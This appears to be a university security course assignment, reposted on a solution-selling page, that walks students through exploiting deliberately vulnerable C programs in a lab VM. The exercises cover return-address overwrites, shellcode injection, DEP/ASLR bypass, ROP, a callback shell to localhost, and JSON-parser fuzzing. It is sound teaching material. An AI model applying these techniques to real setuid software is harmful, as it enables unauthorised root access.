Starting from:

$25

EECS388-Project 4 Application Security Solved

This project will introduce you to control-flow hijacking vulnerabilities in application software, including buffer overflows. We will provide a series of vulnerable programs and a virtual machine environment in which you will develop exploits.

Objectives
•  Be able to identify and avoid buffer overflow vulnerabilities in native code

•  Understand the severity of buffer overflows and the necessity of standard defenses

•  Gain familiarity with machine architecture and assembly language

GDB You will make extensive use of the GDB debugger, which you should recall from EECS 280. Useful commands that you may not know are “disassemble”, “info reg”, “x”, and “stepi”. See the GDB help for details, and don’t be afraid to experiment! This quick reference may also be useful: https://eecs388.org/*/gdb-refcard.pdf.

x86 Assembly These are many good references for Intel assembly language, but note that this project targets the 32-bit x86 ISA. The stack is organized differently in x86 and x86_64. If you are reading any online documentation, ensure that it is based on the x86 architecture, not x86_64.

Targets
The target programs for this project are simple, short C programs with (mostly) clear security vulnerabilities. We have provided source code and a Makefile that compiles all the targets. Your exploits must work against the targets as compiled and executed within the provided VM.

target0: Overwriting a variable on the stack                           (Difficulty: Easy)
This program takes input from stdin and prints a message. Your job is to provide input that causes the program to output: “Hi uniqname! Your grade is A+.” (You can use either group member’s uniqname.) To accomplish this, your input will need to overwrite another variable stored on the stack.

Here’s one approach you might take:

1.   Examine target0.c. Where is the buffer overflow?

2.   Start the debugger (gdb target0) and disassemble _main: (gdb) disas _main. Identify the function calls and the arguments passed to them.

3.   Draw a picture of the stack. How are name[] and grade[] stored relative to each other?

4.   How could a value read into name[] affect the value contained in grade[]? Test your hypothesis by running ./target0 on the command line with different inputs.

target1: Overwriting the return address                                   (Difficulty: Easy)
This program takes input from stdin and prints a message. Your job is to provide input that makes it output: “Your grade is perfect.” Your input will need to overwrite the return address so that the function vulnerable() transfers control to print_good_grade() when it returns.

1.   Examine target1.c. Where is the buffer overflow?

2.   Disassemble print_good_grade. What is its starting address?

3.   Set a breakpoint at the beginning of vulnerable and run the program.

(gdb) break vulnerable

(gdb) run

4.   Disassemble vulnerable and draw the stack. Where is input[] stored relative to %ebp? How long would an input have to be to overwrite this value and the return address?

5.   Examine the %esp and %ebp registers: (gdb) info reg

6.   What are the current values of the saved frame pointer and return address from the stack frame? You can examine two words of memory at %ebp using: (gdb) x/2wx $ebp

7.   What should these values be in order to redirect control to the desired function?

target2: Redirecting control to shellcode                                                           
The remaining targets are owned by the root user and have the suid bit set. Your goal is to cause them to launch a shell, which will therefore have root privileges. This and targets all take input as command-line arguments rather than from stdin. Unless otherwise noted, you should use the shellcode we have provided in shellcode.py. Successfully placing this shellcode in memory and setting the instruction pointer to the beginning of the shellcode (e.g., by returning or jumping to it)

will open a shell.

1.   Examine target2.c. Where is the buffer overflow?

2.   Create a Python program named sol2.py that outputs the provided shellcode:

from shellcode import shellcode print shellcode

3.   Set up the target in GDB using the output of your program as its argument:

gdb --args ./target2 $(python sol2.py)

4.   Set a breakpoint in vulnerable and start the target.

5.   Disassemble vulnerable. Where does buf begin relative to %ebp? What’s the current value of %ebp? What will be the starting address of the shellcode?

6.   Identify the address after the call to strcpy and set a breakpoint there:

(gdb) break *0x08048efb

Continue the program until it reaches that breakpoint.

(gdb) cont

7.   Examine the bytes of memory where you think the shellcode is to confirm your calculation:

(gdb) x/32bx 0xaddress

8.   Disassemble the shellcode: (gdb) disas/r 0xaddress,+32 How does it work?

9.   Modify your solution to overwrite the return address and cause it to jump to the beginning of the shellcode.

target3: Overwriting the return address indirectly                                          
In this target, the buffer overflow is restricted and cannot directly overwrite the return addres. You’ll need to find another way. Your input should cause the provided shellcode to execute and open a root shell.

target4: Beyond strings                                                                                             
This target takes as its command-line argument the name of a data file it will read. The file format is a 32-bit count followed by that many 32-bit integers. Create a data file that causes the provided shellcode to execute and opens a root shell.

target5: Bypassing DEP                                                                                              
This program resembles target2, but it has been compiled with data execution prevention (DEP) enabled. DEP means that the processor will refuse to execute instructions stored on the stack. You can overflow the stack and modify values like the return address, but you can’t jump to any shellcode you inject. You need to find another way to run the command /bin/sh and open a root shell.

.

target6: Variable stack position                                                                             
When we constructed the previous targets, we ensured that the stack would be in the same position every time the vulnerable function was called, but this is often not the case in real targets. In fact, a defense called ASLR (address-space layout randomization) makes buffer overflows harder to exploit by changing the starting location of the stack and other memory areas on each execution. This target resembles target2, but the stack position is randomly offset by 0–255 bytes each time it runs. You need to construct an input that always opens a root shell despite this randomization.

target7: Heap-based exploitation [Extra credit]                                               
This program implements a doubly linked list on the heap. It takes three command-line arguments. Figure out a way to exploit it to open a root shell. You may need to modify the provided shellcode slightly.

oriented programming [Extra credit] 

This target is identical to target2, but it is compiled with DEP enabled. Implement a ROP-based attack to bypass DEP and open a root shell.

target9: Callback shell [Extra credit]                                          (Difficulty: Hard)
This target uses the same code as target3, but you have a different objective. Instead of opening a root shell, implement your own shellcode to implement a callback shell. Your shellcode should open a TCP connection to 127.0.0.1 on port 31337. Commands received over this connection should be executed in a shell, and the output should be sent back to the remote machine.

Fuzz Testing
Manually reviewing source code for vulnerabilities can be laborious and time consuming, and outsiders typically cannot do it at all for closed-source software. For these reasons, both attackers and defenders often use an automated form of vulnerability discovery called “fuzz testing” or

“fuzzing” that attempts to find edge-cases that the application developers failed to account for. Unlike analysis that makes use of source code (“white-box testing”), fuzzing assumes only the ability to execute the software with chosen inputs (“black-box testing”).

In fuzzing, the analyst creates a program (a “fuzzer”) that emulates a user and rapidly provides many different automatically generated inputs to the target application while monitoring for anomalous behavior (e.g., crashes or corrupted return data). When an input consistently causes anomalous behavior, the fuzzer stores it so that the analyst can investigate the problem. The anomalous behavior may be a sign that there is an exploitable vulnerability in the code path that the input exercises.

It’s not usually feasible to test with every possible input, but a clever input generation algorithm can increase the odds that the fuzzer will trigger a bug. For instance, many fuzzers start with a set of valid inputs and then corrupt them by making randomized changes, additions, or deletions.

Setup  A recently founded start-up named ZCorp has hit it big by providing data analysis expertise to customers. Customers provide data to analyze in JSON format, and ZCorp charges them based on the number of JSON string values in each customer’s data. In order to generate bills, they run all customer input through a JSON parser that extracts each JSON string value, along with its index.

ZCorp outsourced development of this JSON parser to an acquaintance of one of the founders. Unfortunately for ZCorp, this developer never took EECS 388, so the parser is probably highly vulnerable to exploitation. If you can find an input that causes a SEGFAULT in the parser, ZCorp can refuse to pay the inept developer until the problem has been fixed.

Goal Your goal for this portion of the project is to create a fuzzer that is capable of automatically finding an input that causes a SEGFAULT in the provided JSON parser. You can download the jsonParser binary from https://eecs388.org/*/parser.tar.gz. It reads JSON data from stdin and writes to stdout and stderr. While the developer did not provide ZCorp with the source code for the parser, they did provide a script, jsonParserTests.py, that checks a set of test cases.

You are not required to create an exploit or understand the cause of the SEGFAULT.

You should not attempt to reverse-engineer the target, as this will likely be a waste of time.

What to submit Create a Python program named fuzzer.py that generates inputs, invokes jsonParser on them, and then determines whether there was a SEGFAULT. Your program should do this repeatedly for different inputs until a SEGFAULT occurs. When this happens, it should print the input data that triggered the fault to stdout as a base64-encoded string and exit. You can confirm that the input causes a SEGFAULT via the command:

echo “base64 encoded data” | base64 -d | ./jsonParser

When you find an input that consistently causes a SEGFAULT, place the base64-encoded string in a text file named fuzzInput.txt and submit it along with your program.

More products